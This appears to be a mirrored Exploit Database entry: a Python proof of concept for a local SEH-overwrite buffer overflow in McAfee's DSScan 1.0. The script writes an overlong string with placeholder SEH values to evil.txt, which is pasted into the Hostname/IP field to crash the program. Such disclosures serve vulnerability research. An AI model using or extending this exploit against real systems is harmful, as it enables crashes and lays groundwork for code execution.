DSScan 1.0 – Local Buffer Overflow (PoC)

• Exploit Database
• 125 阅读

• 作者： Anurag Srivastava
  日期： 2017-08-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42486/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  #!/usr/bin/python # Exploit Title : DSScan v1.0 Hostname/IP Field SEH Overwrite POC # Discovery by: Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Website : http://pyramidcyber.com/ # Discovery Date: 18/08/2017 # Software Link : https://www.mcafee.com/in/downloads/free-tools/dsscan.aspx# # Tested Version: 1.00 # Vulnerability Type: SEH Overwrite POC # Tested on OS: Windows 10 Home x64 # Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press -> ########################################################################################## #-----------------------------------NOTES----------------------------------------------# ########################################################################################## #SEH chain of main thread #AddressSE handler #0019F900 43434343 #42424242 *** CORRUPT ENTRY ***   # Offset to the SEH Frame is 560 buffer = "A"*560 # Address of the Next SEH Frame nseh = "B"*4 # Address to the Handler Code seh = "C" *4 f = open("evil.txt", "wb") f.write(buffer+nseh+seh) f.close()